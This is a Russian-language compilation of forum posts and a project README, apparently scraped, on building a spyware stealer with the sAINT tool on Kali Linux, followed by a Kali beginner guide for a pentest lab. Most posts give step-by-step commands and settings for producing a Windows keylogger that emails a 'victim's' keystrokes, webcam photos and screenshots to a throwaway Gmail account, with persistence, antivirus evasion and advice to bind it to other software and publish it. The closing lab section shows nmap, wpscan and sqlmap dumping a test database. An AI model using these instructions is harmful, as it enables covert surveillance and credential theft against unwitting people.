Saint kali linux ���������
Всем привет! Сегодня мы затронем с вами тему стиллера.
Стиллер — одно из лучших решений социального инженера. Не нужно возиться со ссылками, уговорами, а если склеить стиллер и другую прогу, и опубликовать в инет — делать не придется вообще ничего.
sAINT — простая утилита, стиллер, который многие антивирусы не распознают. (Учитывая Windows-Халтурщик и даже Bitdefender с ОНЛАЙН ЗАЩИТОЙ)
Открываем терминал Kali, и копипастим данные строки (ожидай что установка займет до 10 минут в зависимости от твоей прошивки):
2.sudo apt-get install maven
3.apt install maven default-jdk default-jre
4.openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y (Если возникла ошибка — игнорируй ее)
Для того что бы данные программы отправлялись, используй почту Gmail, на других сервисах она не работает. Интерфейс программы интуитивный, есть возможность вбить в твой стиллер keylogger, сделать фотку вебки и скрин с устройства жертвы.
Настрой отправку для keylogger’а от 500 символов, а лучше 1000, таким образом после 1000 символов сделанных жертвой, тебе будет отправлено письмо, и ты не получишь слишком много спама.
Для корректной работы у жертвы должен быть установлен Java, иначе данные могут не отправиться. Однако учитывая что Java на большинстве устройств стоит изначально, тебе не о чем беспокоиться.
Для того что бы данные программы отправлялись, используй почту Gmail, на других сервисах она не работает. Интерфейс программы интуитивный, есть возможность вбить в твой стиллер keylogger, сделать фотку вебки и скрин с устройства жертвы.
Источник
Saint kali linux ���������
(s)AINT is a Spyware Generator for Windows systems written in Java.
💻 This project was created only for good purposes and personal use.
THIS SOFTWARE IS PROVIDED «AS IS» WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
- Keylogger
- Take Screenshot
- Webcam Capture
- Persistence
Kali Linux — ROLLING EDITION
- On Windows, install the latest Java JRE 8 from Oracle.
- E-mail will be sent when it reaches the specified number of characters.
- Optionally you can enable Screenshot, Webcam Capture and Persistence.
Why does the .EXE need java on target machine to run?
The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language.
Install Java JRE 8
How to uninstall
To uninstall run UNINSTALL.bat with administrative permissions.
Copyright (c) 2017, Tiago Rodrigo Lampert
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS «AS IS» AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
About
👁️ (s)AINT is a Spyware Generator for Windows systems written in Java. [Discontinued]
Источник
Многофункциональный кейлоггер sAINT [kali linux]
Pepe Frog
Pepe Frog
Pepe Frog
Что понадобится:
1. Kali Linux
2. Интернет
3. Левая почта gmail ( только gmail! )
4. На пк жертвы должна быть установлена java(не меньше версии 1.0.0)
5. Прямые руки и терпение
Начнём..
Включаем kali linux, открываем терминал и вводим следующие команды:
apt install maven
apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y
chmod +x configure.sh
java -jar sAINT.jar
Открылась программа для создания кейлоггера(там и говорится, что работает только с gmail почтой)
Далее ОБЯЗАТЕЛЬНО в настройках вашего гугл аккаунта разрешить доступ неизвестным приложениям(как-то так)
Нажимаем ENTER
Вводим почту
Вводим пароль
Далее идёт настройка кейлоггера
1. Делать скриншоты? Пишете y/n (y — да, n — нет)
2. Сохранять ли фото с веб камеры?
3. Загрузить на диск?(вписывается в автозагрузку и копируется на диск)
4. Сохранять все вышеперечисленные файлы на компе жертвы?
5. После какого кол-ва символов отправлять все накопленное на почту(кстати, он так же учитывает клавишы типо ESC, alt и т.д.)
Дальше пойдёт компиляция
(Если она будет долго идти(больше 3 минут), то нажмите CTRL+C и попробуйте заново)
Дальше спросит переделать ли .jar в exe(думаю многим это и надо)
Всё. Заходим в папку sAINT/target и видим там .exe файл.
В папке sAINT так же лежит батник удаления вируса, сохарните на всякий случай..
Как же не споймать такой вирус самому? Просто не устанавливайте себе java и будет вам счастье.
Всем удачи..
Источник
Интересно sAINT — стиллер на Kali Linux, который твой Windows Защитник не распознает
CMDfromBAT
«Рыбак» со стажем
Перейдя по данной ссылке ты попадешь на канал UnderMind, где парнишка расскажет тебе все в самых маленьких деталях. Если же ты не однокнопочный, то просто следуй моим инструкциям.
Открываем терминал Kali, и копипастим данные строки (ожидай что установка займет до 10 минут в зависимости от твоей прошивки):
apt update
sudo apt-get install maven
apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y — Если возникла ошибка — игнорируй ее
git clone
cd sAINT
chmod +x configure.sh
./configure.sh
java -jar sAINT.jar
Для того что бы данные программы отправлялись, используй почту Gmail, на других сервисах она не работает. Интерфейс программы интуитивный, есть возможность вбить в твой стиллер keylogger, сделать фотку вебки и скрин с устройства жертвы.
Советы:
Настрой отправку для keylogger’а от 500 символов, а лучше 1000, таким образом после 1000 символов сделанных жертвой, тебе будет отправлено письмо, и ты не получишь слишком много спама.
ВАЖНО
Для корректной работы у жертвы должен быть установлен Java, иначе данные могут не отправиться. Однако учитывая что Java на большинстве устройств стоит изначально, тебе не о чем беспокоиться.
Источник
Kali Linux для начинающих
14 декабря будет запущена новая «Test lab» — лаборатория тестирования на проникновение, имитирующая работу реальной корпоративной сети, в которой каждый желающий сможет проверить свои навыки тестирования на проникновение. Поскольку порог вхождения для выполнения всех заданий лаборатории достаточно высокий, мы решили выпустить небольшой гайд для начинающих по работе с Kali Linux 2018.4 — одним из самых популярных пентест-дистрибутивов, разработанного как преемник BackTrack и основного на Debian.
Причина популярности простая – довольно дружелюбный интерфейс и наличие необходимых инструментов для пентеста “из коробки”. Инструменты распределены по категориям, что очень удобно. Имеются варианты установки на АРМ, например, Raspberry Pi 3, а также на мобильные платформы под управлением Android. Я сейчас говорю про Kali NetHunter – тот же Kali, который практически без изменений устанавливается поверх Android и работающий внутри chroot-окружения.
Получаем токен, используя SQLi
По легенде у нас есть некий хост test.lab. Наша задача — определить уязвимости и выполнить их эксплуатацию.
Начнем с разведки — выполним сканирование портов: nmap -v test.lab
Сканирование в режиме по умолчанию результатов не дало, произведем сканирование всех портов: nmap -v -p 1-65535 192.168.60.13
На порту 9447 доступно веб-приложение:
Используя инструмент nikto, определим, что вероятнее всего используется CMS WordPress:
nikto -host test.lab:9447
Проверим приложение, используя WPScan: wpscan —url http://test.lab:9447
Нам удалось обнаружить плагин WP Symposium 15.5.1.Для данной версии имеется уязвимость SQL Injection, и также в выводе представлены ссылки на базы с описанием уязвимости, где мы и будем искать информацию.
Мы нашли способ эксплуатировать уязвимость на www.exploit-db.com/exploits/37824
Теперь нужно проверить ее, подставив этот параметр к нашему url.
Используя Burp Suite, посмотрим, какие запросы приходят при обращении к этому адресу:
Скопируем этот GET запрос в файл и передадим его в sqlmap с параметром -r, добавив ключ уязвимого параметра -p “size” и —dbs для нахождения баз данных.
sqlmap -r qwe -p “size” —dbs
В итоге мы получили несколько баз. Проверим содержимое базы wordpress_test и найденных таблиц:
sqlmap -r qwe -D wordpress_test —table
sqlmap -r qwe -D wordpress_test -T wp_posts —dump
В таблице wp_post в одной из скрытых записей нам удалось найти токен Y@u-wIn. .
Использование Nemeisida WAF не позволит выполнить эксплуатацию подобной уязвимости.
600 доступных инструментов, которые найдут свое применение у любого — от начинающего до профессионала.
Соблюдайте законодательство и до встречи в Test lab v.12.
Источник
